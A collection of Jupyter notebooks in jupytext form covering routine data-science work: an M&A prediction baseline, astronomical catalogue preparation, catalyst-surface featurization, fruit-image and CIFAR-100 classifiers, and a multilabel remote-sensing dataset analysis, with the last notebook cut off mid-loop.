X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=2)
scaler = sklearn.preprocessing.StandardScaler()
scaler.fit(X_train[:, -3:])
X_train = np.hstack([X_train[:, :-3], scaler.transform(X_train[:, -3:])])
X_test = np.hstack([X_test[:, :-3], scaler.transform(X_test[:, -3:])])
model = sklearn.ensemble.RandomForestClassifier(n_estimators=50)
#model = LogisticRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
accuracy_score(y_train, y_pred)
y_pred = model.predict(X_test)
accuracy_score(y_test, y_pred)
comp_data['country_code']
|
Baseline-for-M&A-Prediction.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python (herschelhelp_internal)
# language: python
# name: helpint
# ---
# # ELAIS-N1 master catalogue
# ## Preparation of UKIRT Infrared Deep Sky Survey / Deep Extragalactic Survey (UKIDSS/DXS)
#
# The catalogue comes from `dmu0_UKIDSS-DXS_DR10plus`.
#
# In the catalogue, we keep:
#
# - The identifier (it's unique in the catalogue);
# - The position;
# - The stellarity;
# - The magnitude for each band in apertude 3 (2 arcsec).
# - The kron magnitude to be used as total magnitude (no “auto” magnitude is provided).
#
# The magnitudes are “*Vega like*”. The AB offsets are given by Hewett *et al.*
# (2016):
#
# | Band | AB offset |
# |------|-----------|
# | J | 0.938 |
# | H | 1.379 |
# | K | 1.900 |
#
# A query to the UKIDSS database with 242.9+55.071 position returns a list of images taken between 2007 and 2009. Let's take 2008 for the epoch.
#
from herschelhelp_internal import git_version
print("This notebook was run with herschelhelp_internal version: \n{}".format(git_version()))
# +
# %matplotlib inline
# #%config InlineBackend.figure_format = 'svg'
import matplotlib.pyplot as plt
plt.rc('figure', figsize=(10, 6))
from collections import OrderedDict
import os
from astropy import units as u
from astropy.coordinates import SkyCoord
from astropy.table import Column, Table
import numpy as np
from herschelhelp_internal.flagging import gaia_flag_column
from herschelhelp_internal.masterlist import nb_astcor_diag_plot, remove_duplicates
from herschelhelp_internal.utils import astrometric_correction, mag_to_flux
# +
OUT_DIR = os.environ.get('TMP_DIR', "./data_tmp")
try:
os.makedirs(OUT_DIR)
except FileExistsError:
pass
RA_COL = "dxs_ra"
DEC_COL = "dxs_dec"
# -
# ## I - Column selection
# +
imported_columns = OrderedDict({
'sourceid': 'dxs_id',
'RA': 'dxs_ra',
'Dec': 'dxs_dec',
'JAPERMAG3': 'm_ap_ukidss_j',
'JAPERMAG3ERR': 'merr_ap_ukidss_j',
'JKRONMAG': 'm_ukidss_j',
'JKRONMAGERR': 'merr_ukidss_j',
'KAPERMAG3': 'm_ap_ukidss_k',
'KAPERMAG3ERR': 'merr_ap_ukidss_k',
'KKRONMAG': 'm_ukidss_k',
'KKRONMAGERR': 'merr_ukidss_k',
'PSTAR': 'dxs_stellarity'
})
catalogue = Table.read(
"../../dmu0/dmu0_UKIDSS-DXS_DR10plus/data/UKIDSS-DR10plus_ELAIS-N1.fits")[list(imported_columns)]
for column in imported_columns:
catalogue[column].name = imported_columns[column]
epoch = 2008
# Clean table metadata
catalogue.meta = None
# +
# Adding flux and band-flag columns
for col in catalogue.colnames:
if col.startswith('m_'):
errcol = "merr{}".format(col[1:])
# DXS uses a huge negative number for missing values
catalogue[col][catalogue[col] < -100] = np.nan
catalogue[errcol][catalogue[errcol] < -100] = np.nan
# Vega to AB correction
if col.endswith('j'):
catalogue[col] += 0.938
elif col.endswith('k'):
catalogue[col] += 1.900
else:
print("{} column has wrong band...".format(col))
flux, error = mag_to_flux(np.array(catalogue[col]), np.array(catalogue[errcol]))
# Fluxes are added in µJy
catalogue.add_column(Column(flux * 1.e6, name="f{}".format(col[1:])))
catalogue.add_column(Column(error * 1.e6, name="f{}".format(errcol[1:])))
# Band-flag column
if "ap" not in col:
catalogue.add_column(Column(np.zeros(len(catalogue), dtype=bool), name="flag{}".format(col[1:])))
# TODO: Set to True the flag columns for fluxes that should not be used for SED fitting.
# -
catalogue[:10].show_in_notebook()
# ## II - Removal of duplicated sources
# We remove duplicated objects from the input catalogues.
# +
SORT_COLS = ['merr_ap_ukidss_j', 'merr_ap_ukidss_k']
FLAG_NAME = 'dxs_flag_cleaned'
nb_orig_sources = len(catalogue)
catalogue = remove_duplicates(catalogue, RA_COL, DEC_COL, sort_col=SORT_COLS, flag_name=FLAG_NAME)
nb_sources = len(catalogue)
print("The initial catalogue had {} sources.".format(nb_orig_sources))
print("The cleaned catalogue has {} sources ({} removed).".format(nb_sources, nb_orig_sources - nb_sources))
print("The cleaned catalogue has {} sources flagged as having been cleaned".format(np.sum(catalogue[FLAG_NAME])))
# -
# ## III - Astrometry correction
#
# We match the astrometry to the Gaia one. We limit the Gaia catalogue to sources with a g band flux between the 30th and the 70th percentile. Some quick tests show that this give the lower dispersion in the results.
gaia = Table.read("../../dmu0/dmu0_GAIA/data/GAIA_ELAIS-N1.fits")
gaia_coords = SkyCoord(gaia['ra'], gaia['dec'])
nb_astcor_diag_plot(catalogue[RA_COL], catalogue[DEC_COL],
gaia_coords.ra, gaia_coords.dec)
# +
delta_ra, delta_dec = astrometric_correction(
SkyCoord(catalogue[RA_COL], catalogue[DEC_COL]),
gaia_coords
)
print("RA correction: {}".format(delta_ra))
print("Dec correction: {}".format(delta_dec))
# -
catalogue[RA_COL] += delta_ra.to(u.deg)
catalogue[DEC_COL] += delta_dec.to(u.deg)
nb_astcor_diag_plot(catalogue[RA_COL], catalogue[DEC_COL],
gaia_coords.ra, gaia_coords.dec)
# ## IV - Flagging Gaia objects
catalogue.add_column(
gaia_flag_column(SkyCoord(catalogue[RA_COL], catalogue[DEC_COL]), epoch, gaia)
)
# +
GAIA_FLAG_NAME = "dxs_flag_gaia"
catalogue['flag_gaia'].name = GAIA_FLAG_NAME
print("{} sources flagged.".format(np.sum(catalogue[GAIA_FLAG_NAME] > 0)))
# -
# # V - Saving to disk
catalogue.write("{}/UKIDSS-DXS.fits".format(OUT_DIR), overwrite=True)
|
dmu1/dmu1_ml_ELAIS-N1/1.2_UKIDSS-DXS.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.9.10 ('autocat39')
# language: python
# name: python3
# ---
# +
from autocat.surface import generate_surface_structures
from autocat.saa import generate_saa_structures
from autocat.utils import extract_structures
from autocat.learning.featurizers import Featurizer
from dscribe.descriptors import CoulombMatrix
from matminer.featurizers.composition import ElementProperty
# -
# In this example we show how to use `AutoCat` to featurize structures with the `Featurizer` class.
#
# Here we will be featurizing mono-elemental surfaces.
# +
# Generate structures to be featurized
mono_surfaces_dictionary = generate_surface_structures(
species_list=["Fe", "Ru", "Cu", "Pd"],
facets={"Fe": ["110"], "Ru":["0001"], "Cu":["111"], "Pd":["111"]}
)
mono_surfaces_structures = extract_structures(mono_surfaces_dictionary)
saa_surfaces_dictionary = generate_saa_structures(
host_species=["Cu", "Au"],
dopant_species=["Pt", "Pd"],
facets={"Cu":["111"], "Au":["111"]}
)
saa_surfaces_structures = extract_structures(saa_surfaces_dictionary)
all_structures = mono_surfaces_structures.copy()
all_structures.extend(saa_surfaces_structures)
# -
print(all_structures[0].get_chemical_formula())
# Instantiate featurizer based on Coulomb Matrix
coulomb_featurizer = Featurizer(
featurizer_class=CoulombMatrix,
design_space_structures=all_structures
)
print(coulomb_featurizer)
# Featurize just Fe
fe_feature_vector = coulomb_featurizer.featurize_single(all_structures[0])
print(fe_feature_vector.shape)
# Featurize all structures into a single matrix
feature_matrix = coulomb_featurizer.featurize_multiple(all_structures)
print(feature_matrix.shape)
# +
# Instantiate element property featurizer
element_featurizer = Featurizer(
featurizer_class=ElementProperty,
design_space_structures=all_structures,
preset="matminer"
)
print(element_featurizer)
# -
# Featurize just Fe
fe_feature_vector = element_featurizer.featurize_single(all_structures[0])
print(fe_feature_vector.shape)
# Featurize all structures at once
feature_matrix = element_featurizer.featurize_multiple(all_structures)
print(feature_matrix.shape)
|
examples/learning/featurizing_structures.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/eferos93/sml_project/blob/master/project.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + colab={} colab_type="code" id="zX8mwS7rIp7R"
import torch
import torch.nn as nn
import torch.nn.functional as F
from sklearn.datasets import load_files
import torch.optim as optim
import os
import numpy as np
import time
from PIL import Image
from torchvision.utils import make_grid
from torchvision import datasets,transforms
from torch.utils.data import Dataset
from torchvision.datasets import ImageFolder
from torch.autograd import Variable
import torchvision
import matplotlib.pyplot as plt
import copy
from glob import glob
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="L0XNZEm-P0sy" outputId="4d2e0acb-5b44-4e98-9b96-f349a03e2774"
# !unzip drive/My\ Drive/5857_1166105_bundle_archive
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" id="FqowUObxIoTQ" outputId="2e4ce2b8-2a36-4d36-a17e-eb0417ae120c"
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" id="PSLAUmvLettn" outputId="b5c2682e-0e44-4a67-a292-ab6a20946675"
path = "data/fruits/fruits-360/"
files_training = glob(os.path.join(path,'Training', '*/*.jpg'))
num_images = len(files_training)
print('Number of images in Training file:', num_images)
# + colab={"base_uri": "https://localhost:8080/", "height": 35} colab_type="code" id="VoFm6RmsY2qc" outputId="b46ef783-1f3d-479d-c46b-0e11d071dc85"
os.getcwd()
glob(os.path.join(path,'Training', '*/*.jpg'))
os.path.join(path,'Training', '*/*.jpg')
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="t2XzGpyhZR7S" outputId="0cab7928-6e4f-46f5-89e1-d979f14a196a"
min_images = 1000
im_cnt = []
class_names = []
print('{:18s}'.format('class'), end='')
print('Count:')
print('-' * 24)
for folder in os.listdir(os.path.join(path, 'Training')):
folder_num = len(os.listdir(os.path.join(path,'Training',folder)))
im_cnt.append(folder_num)
class_names.append(folder)
print('{:20s}'.format(folder), end=' ')
print(folder_num)
if (folder_num < min_images):
min_images = folder_num
folder_name = folder
num_classes = len(class_names)
print("\nMinumum imgages per category:", min_images, 'Category:', folder)
print('Average number of Images per Category: {:.0f}'.format(np.array(im_cnt).mean()))
print('Total number of classes: {}'.format(num_classes))
# + colab={} colab_type="code" id="9bQ_dZtRZgDW"
tensor_transform = transforms.Compose([
transforms.ToTensor()
])
all_data = ImageFolder(os.path.join(path, 'Training'), tensor_transform)
# + colab={} colab_type="code" id="B9Kd5shSZizl"
data_loader = torch.utils.data.DataLoader(all_data, batch_size=512, shuffle=True)
# + colab={"base_uri": "https://localhost:8080/", "height": 51} colab_type="code" id="i1PRrOcrZn5h" outputId="141d89c1-0863-4956-fb5a-a2964cae3390"
pop_mean = []
pop_std = []
for i, data in enumerate(data_loader, 0):
numpy_image = data[0].numpy()
batch_mean = np.mean(numpy_image, axis=(0,2,3))
batch_std = np.std(numpy_image, axis=(0,2,3))
pop_mean.append(batch_mean)
pop_std.append(batch_std)
pop_mean = np.array(pop_mean).mean(axis=0)
pop_std = np.array(pop_std).mean(axis=0)
print(pop_mean)
print(pop_std)
# + colab={} colab_type="code" id="qhzdLDxDaUCi"
np.random.seed(123)
shuffle = np.random.permutation(num_images)
# + colab={"base_uri": "https://localhost:8080/", "height": 68} colab_type="code" id="BsT9Qe8baXLK" outputId="b2de2687-2bf9-4a93-a170-395d730d2529"
split_val = int(num_images * 0.2)
print('Total number of images:', num_images)
print('Number of valid images after split:',len(shuffle[:split_val]))
print('Number of train images after split:',len(shuffle[split_val:]))
# + colab={} colab_type="code" id="1oXyBqXwcWWJ"
class FruitTrainDataset(Dataset):
def __init__(self, files, shuffle, split_val, class_names, transform=transforms.ToTensor()):
self.shuffle = shuffle
self.class_names = class_names
self.split_val = split_val
self.data = np.array([files[i] for i in shuffle[split_val:]])
self.transform=transform
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
img = Image.open(self.data[idx])
name = self.data[idx].split('/')[-2]
y = self.class_names.index(name)
img = self.transform(img)
return img, y
class FruitValidDataset(Dataset):
def __init__(self, files, shuffle, split_val, class_names, transform=transforms.ToTensor()):
self.shuffle = shuffle
self.class_names = class_names
self.split_val = split_val
self.data = np.array([files[i] for i in shuffle[:split_val]])
self.transform=transform
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
img = Image.open(self.data[idx])
name = self.data[idx].split('/')[-2]
y = self.class_names.index(name)
img = self.transform(img)
return img, y
class FruitTestDataset(Dataset):
def __init__(self, path, class_names, transform=transforms.ToTensor()):
self.class_names = class_names
self.data = np.array(glob(os.path.join(path, '*/*.jpg')))
self.transform=transform
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
img = Image.open(self.data[idx])
name = self.data[idx].split('/')[-2]
y = self.class_names.index(name)
img = self.transform(img)
return img, y
# + colab={} colab_type="code" id="f9iBYr_ycXYk"
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomVerticalFlip(),
transforms.ToTensor(),
transforms.Normalize(pop_mean, pop_std) # These were the mean and standard deviations that we calculated earlier.
]),
'Test': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(pop_mean, pop_std) # These were the mean and standard deviations that we calculated earlier.
]),
'valid': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(pop_mean, pop_std) # These were the mean and standard deviations that we calculated earlier.
])
}
train_dataset = FruitTrainDataset(files_training, shuffle, split_val, class_names, data_transforms['train'])
valid_dataset = FruitValidDataset(files_training, shuffle, split_val, class_names, data_transforms['valid'])
test_dataset = FruitTestDataset('/content/fruits-360/Test', class_names, transform=data_transforms['Test'])
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=64, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=64, shuffle=True)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=64, shuffle=True)
# + colab={} colab_type="code" id="cNlrIzLjcu84"
dataloaders = {'train': train_loader,
'valid': valid_loader,
'Test': test_loader}
dataset_sizes = {
'train': len(train_dataset),
'valid': len(valid_dataset),
'Test': len(test_dataset)
}
# + colab={} colab_type="code" id="EdD6hoELcz9m"
def imshow(inp, title=None):
"""Imshow for Tensor."""
inp = inp.numpy().transpose((1, 2, 0))
inp = pop_std * inp + pop_mean
inp = np.clip(inp, 0, 1)
plt.imshow(inp)
if title is not None:
plt.title(title)
plt.pause(0.001)
# + colab={"base_uri": "https://localhost:8080/", "height": 306} colab_type="code" id="_pJwqU8Jc2Zh" outputId="066c3776-3420-4317-9346-722f766d9299"
inputs, classes = next(iter(train_loader))
out = make_grid(inputs)
cats = ['' for x in range(len(classes))]
for i in range(len(classes)):
cats[i] = class_names[classes[i].item()]
imshow(out)
print(cats)
# + [markdown] colab_type="text" id="rlnXTcp0c6Rw"
# # Network
# + colab={"base_uri": "https://localhost:8080/", "height": 83, "referenced_widgets": ["304788cedc904dec887ad1df4014925f", "48fe9858dba94bcf8ebda5b0980ab3d5", "c3657cb204de4850b6c3bde07cd355ed", "3ca860ee18a34b11844d9dcaed4c44cf", "2d6ade54451f4a2687da3bdc88e4a863", "<KEY>", "c951a746541e411abce3ef98edc0a273", "8bc11a88008f42c9a0b3e073b7bfcdd8"]} colab_type="code" id="iaH1gKObc9qe" outputId="e29cd82a-95f8-4fc0-b635-a2eebc84be6f"
model = torchvision.models.vgg11(num_classes)
model.to(device)
optimizer = optim.SGD(model.parameters(), lr=0.01)
criterion = nn.CrossEntropyLoss()
exp_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)
# + colab={} colab_type="code" id="dMtnCoBHgFqf"
def train(model, criterion, optimizer, scheduler, num_epochs=30):
since = time.time() # allows us to keep track of how long it took
best_acc = 0.0 # allows us to store the best_acc rate (for validation stage)
# Loop through the data-set num_epochs times.
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 15)
for phase in ['train', 'valid']:
if phase == 'train':
scheduler.step()
model.train() # This sets the model to training mode
else:
model.eval() # this sets the model to evaluation mode
running_loss = 0.0
running_corrects = 0
# using the dataloaders to load data in batches
for inputs, labels in dataloaders[phase]:
# putting the inputs and labels on cuda (gpu)
inputs = inputs.to(device)
labels = labels.to(device)
# zero the gradient
optimizer.zero_grad()
# if training phase, allow calculating the gradient, but don't allow otherwise
with torch.set_grad_enabled(phase == 'train'):
# get outputs and predictions
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels) # get value of loss function with the current weights
if phase == 'train':
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))
# keep track of the best weights for the validation dataset
if phase == 'valid' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
print()
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best validation Acc: {:4f}'.format(best_acc))
model.load_state_dict(best_model_wts)
return model
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} colab_type="code" id="_68YsD6-gc-o" outputId="69392d1f-dde6-466a-9282-14dce5000ee4"
model = train(model, criterion, optimizer,
exp_scheduler, num_epochs=30)
# + colab={"base_uri": "https://localhost:8080/", "height": 34} colab_type="code" id="E6L3Y9dWy4dT" outputId="63d11d15-9f6d-4c41-9cf4-19a752b73141"
correct = 0
total = 0
with torch.no_grad():
for images, labels in dataloaders['Test']:
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {:.3f}%'.format(dataset_sizes['Test'],
100 * correct / dataset_sizes['Test']))
|
project/project.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Train ResNet34 model
from importlib.util import find_spec
if find_spec("model") is None:
import sys
sys.path.append('..')
import torch.nn.functional as F
import torch
from model.model import Resnet34
from data_loader.data_loaders import Cifar100DataLoader
torch.cuda.is_available()
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
dl = Cifar100DataLoader('../data', 32)
data, target = next(iter(dl))
data.shape, target
model = Resnet34()
model.to(device)
model(data.to(device))
# ### Define Loss function and optimizer
trainable_params = filter(lambda p: p.requires_grad, model.parameters())
criterion = F.cross_entropy
optimizer = torch.optim.SGD(trainable_params, lr=0.01, momentum=0.9)
for epoch in range(10):
running_loss = 0.0
for batch_idx, (data, target) in enumerate(dl):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
loss.backward()
optimizer.step()
running_loss+= loss.item()
if batch_idx % 199 == 0: # print every 2000 mini_batches
print('[%d, %5d] loss: %.3f' %
(epoch + 1, batch_idx + 1, running_loss / 200))
running_loss = 0.0
|
notebooks/03_train_resnet34.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Imports
# +
import os
import cv2
import glob
import matplotlib
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from minisom import MiniSom
from sklearn.metrics import classification_report, roc_curve, roc_auc_score, r2_score
from sklearn.preprocessing import OneHotEncoder
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras.layers import concatenate, Embedding, Input, Flatten
from tensorflow.keras.models import Model
from tensorflow.keras.utils import plot_model
# -
# # Dataset Summary
#
# **Name:** DFC15_multilabel
# +
BASE_DATA_DIR = "/home/jovyan/work/data/"
DATASET_DIR = "DFC15_multilabel"
FULL_DATASET_DIR = os.path.join(BASE_DATA_DIR, DATASET_DIR)
TRAIN_IMAGES_PATH = os.path.join(FULL_DATASET_DIR, "images_tr")
TEST_IMAGES_PATH = os.path.join(FULL_DATASET_DIR, "images_test")
print(f"Dataset in {FULL_DATASET_DIR}")
print(f"Contents of dataset dir is {os.listdir(FULL_DATASET_DIR)}")
# -
multilabel_df = pd.read_csv(os.path.join(FULL_DATASET_DIR, "multilabel.csv"))
multilabel_df.head()
print("Total number of samples: ", multilabel_df.shape[0])
print("Total number of features: ", multilabel_df.shape[1] - 1)
multilabel_df.describe()
multilabel_df.info()
# ## Sample Distributions
print("Number of images in train set:", len(glob.glob(os.path.join(TRAIN_IMAGES_PATH, "*.png"))))
print("Number of images in test set:", len(glob.glob(os.path.join(TEST_IMAGES_PATH, "*.png"))))
multilabel_df["in_train"] = np.zeros((multilabel_df.shape[0],), dtype=int)
for image_file in glob.glob(os.path.join(TRAIN_IMAGES_PATH, "*.png")):
basename = os.path.basename(image_file)
image_id = os.path.splitext(basename)[0]
multilabel_df.loc[multilabel_df["image\\label"] == int(image_id), "in_train"] = 1
print("Number of images in train set:", multilabel_df["in_train"].sum())
print("Number of images in test set:", (multilabel_df["in_train"] == 0).sum())
# ## Label Analysis
multilabel_df["total_label_count"] = multilabel_df.drop(["image\\label", "in_train"], axis=1).sum(axis=1)
multilabel_df.head()
# ### Label Distributions to Samples
multilabel_df["total_label_count"].describe()
# +
plt_data = multilabel_df.drop(["image\\label", "total_label_count", "in_train"], axis=1).sum(axis=0)
fig, ax = plt.subplots(figsize=(15, 8))
ax.bar(plt_data.index, plt_data.values, color=matplotlib.cm.rainbow(np.linspace(0, 1, 7)))
rects = ax.patches
labels = plt_data.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Label Counts Plot", fontsize=18)
plt.xlabel("Label Name", fontsize=16)
plt.ylabel("Occurence Count", fontsize=16)
plt.show()
# -
# ### Label Distributions Over Train and Test Sets
multilabel_df[multilabel_df["in_train"] == 1].describe()
multilabel_df[multilabel_df["in_train"] == 0].describe()
# ## Label Correlations
just_labels_df = multilabel_df.drop(["image\\label", "total_label_count", "in_train"], axis=1)
just_labels_df.corr()
# +
fig, ax = plt.subplots(figsize=(8, 8))
ax.xaxis.tick_top()
im = ax.imshow(just_labels_df.corr())
plt.xticks(ticks=np.arange(just_labels_df.shape[1]), labels=just_labels_df.columns)
plt.yticks(ticks=np.arange(just_labels_df.shape[1]), labels=just_labels_df.columns)
cbar = ax.figure.colorbar(im, ax=ax)
cbar.ax.set_ylabel("Pearson Correlation Coef.", rotation=-90, va="bottom")
plt.title("Labels Correlation Plot")
plt.show()
# -
# ## Subset Analysis
total_unique_subsets = multilabel_df.drop(["image\\label", "in_train", "total_label_count"], axis=1).drop_duplicates().values
# ### Total Number of Unique Subsets
len(total_unique_subsets)
print(f"Number of unique subsets in whole dataset: {len(total_unique_subsets)}")
# ### Total Number of Unique Subsets in Train Set
training_subsets = multilabel_df[multilabel_df["in_train"] == 1] \
.drop(["image\\label", "in_train", "total_label_count"], axis=1).drop_duplicates().values
print(f"Number of unique subsets in train set: {len(training_subsets)}")
# ### Total Number of Subsets Do Not Exist in Train Set
print(f"Number of subsets which do not exist in train set: \
{len(set(map(tuple, total_unique_subsets)) - set(map(tuple, training_subsets)))}")
# ### Total Number of Unique Subsets in Test Set
test_subsets = multilabel_df[multilabel_df["in_train"] == 0] \
.drop(["image\\label", "in_train", "total_label_count"], axis=1).drop_duplicates().values
print(f"Number of unique subsets in test set: {len(test_subsets)}")
# ### Total Number of Subsets Do Not Exist in Test Set
print(f"Number of subsets which do not exist in test set: \
{len(set(map(tuple, total_unique_subsets)) - set(map(tuple, test_subsets)))}")
# ## Assigning Subsets to the Samples
multilabel_df["subset"] = multilabel_df.drop(["image\\label", "in_train", "total_label_count"], axis=1) \
.apply(lambda x: (x.values.reshape(1, -1) == total_unique_subsets).all(axis=1).nonzero()[0][0], axis=1)
multilabel_df.sample(10)
# ### Subset Distribution in the Dataset
# +
subset_value_counts = multilabel_df["subset"].value_counts()
fig, ax = plt.subplots(figsize=(15, 8))
subset_value_counts.plot.bar(ax=ax, color=matplotlib.cm.rainbow(np.linspace(0, 1, len(total_unique_subsets))))
rects = ax.patches
labels = subset_value_counts.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Subset Counts Plot", fontsize=18)
plt.xlabel("Subset ID", fontsize=16)
plt.ylabel("Occurence Count", fontsize=16)
plt.show()
# -
# ### Subset Distribution in Train Set
# +
subset_value_counts = multilabel_df[multilabel_df["in_train"] == 1]["subset"].value_counts()
fig, ax = plt.subplots(figsize=(15, 8))
subset_value_counts.plot.bar(ax=ax, color=matplotlib.cm.rainbow(np.linspace(0, 1, len(total_unique_subsets))))
rects = ax.patches
labels = subset_value_counts.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Subset Counts Plot", fontsize=18)
plt.xlabel("Subset ID", fontsize=16)
plt.ylabel("Occurence Count", fontsize=16)
plt.show()
# -
# ### Subset Distribution in Test Set
# +
subset_value_counts = multilabel_df[multilabel_df["in_train"] == 0]["subset"].value_counts()
fig, ax = plt.subplots(figsize=(15, 8))
subset_value_counts.plot.bar(ax=ax, color=matplotlib.cm.rainbow(np.linspace(0, 1, len(total_unique_subsets))))
rects = ax.patches
labels = subset_value_counts.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width() / 2, height + 5, label, ha="center", va="bottom")
plt.title("Subset Counts Plot", fontsize=18)
plt.xlabel("Subset ID", fontsize=16)
plt.ylabel("Occurence Count", fontsize=16)
plt.show()
# -
# # Feature Extraction
vgg16_network = VGG16(include_top=False,
weights='imagenet',
input_shape=(224, 224, 3),
pooling=None)
# +
resized_raw_train_images = list()
resized_raw_train_labels = list()
for raw_image_file in glob.glob(os.path.join(TRAIN_IMAGES_PATH, "*.png")):
raw_img = cv2.imread(raw_image_file)
raw_img = cv2.cvtColor(raw_img, cv2.COLOR_BGR2RGB)
resized_raw_img = cv2.resize(raw_img, (224, 224))
resized_raw_train_images.append(resized_raw_img)
resized_raw_train_labels.append(os.path.basename(raw_image_file).split(".")[0])
# -
preprediction_images = np.array(resized_raw_train_images)
preprediction_images.shape
# ## CITF Creation With Word Embedding
#
# **Plan**:
#
# <img src="./Enhanced CITF Vector Creation Plan.png" />
label_sequence_train = multilabel_df[multilabel_df["in_train"] == 1] \
.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
label_sequence_train.shape
label_sequence_test = multilabel_df[multilabel_df["in_train"] == 0] \
.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
label_sequence_test.shape
# +
embeddings_index = {}
with open('glove/glove.6B.100d.txt') as f:
for line in f:
word, coefs = line.split(maxsplit=1)
coefs = np.fromstring(coefs, 'f', sep=' ')
embeddings_index[word] = coefs
f.close()
print('Found %s word vectors.' % len(embeddings_index))
# +
embedding_matrix = np.zeros((9, 100))
for i, word in enumerate(just_labels_df.columns):
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
# words not found in embedding index will be all-zeros.
embedding_matrix[i] = embedding_vector
# +
vis_input = Input(shape=(224, 224, 3))
seq_input = Input(shape=(8,), dtype="int32")
vgg16_model = VGG16(include_top=False,
weights='imagenet',
input_shape=(224, 224, 3),
input_tensor=vis_input,
pooling=None)
vgg16_model_output = Flatten()(vgg16_model.outputs[0])
embedding_layer = Embedding(9, 100, weights=[embedding_matrix], input_length=8, trainable=False)
embedded_sequences = embedding_layer(seq_input)
embedded_sequences = Flatten()(embedded_sequences)
output = concatenate([vgg16_model_output, embedded_sequences], axis=1)
model = Model(inputs=[vis_input, seq_input], outputs=output)
# -
plot_model(model, show_shapes=True)
def create_word_vecs(labels):
result_list = list()
for idx, label in enumerate(labels):
if label == 1:
will_be_added = np.zeros_like(labels, dtype="int32")
will_be_added[idx] = 1
result_list.append(will_be_added)
return np.array(result_list)
def create_prediction_seqs(tags):
result = np.zeros_like(tags, dtype="int32")
for idx, labels in enumerate(tags):
nonzero_indices = labels.nonzero()[0]
index_count = 0
for idx2, label in enumerate(labels):
if label == 1:
result[idx][idx2] = nonzero_indices[index_count]
index_count += 1
if index_count == len(nonzero_indices):
break
return result
filtered_idx = multilabel_df["in_train"] == 1
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
prediction_tags = create_prediction_seqs(tags)
prediction_tags.shape
preprediction_images.shape
ecitf_vector = model.predict([preprediction_images, prediction_tags])
ecitf_vector.shape
# ## CITF Creation Without Word Embedding
postprediction_features = vgg16_network.predict(preprediction_images)
postprediction_features.shape
flattened_postprediction_features = postprediction_features.reshape(postprediction_features.shape[0], -1)
# +
citf_vector = list()
citf_vector_train_test = list()
for flattened_postprediction_feature, image_id in zip(flattened_postprediction_features, resized_raw_train_labels):
filtered_idx = multilabel_df["image\\label"] == int(image_id)
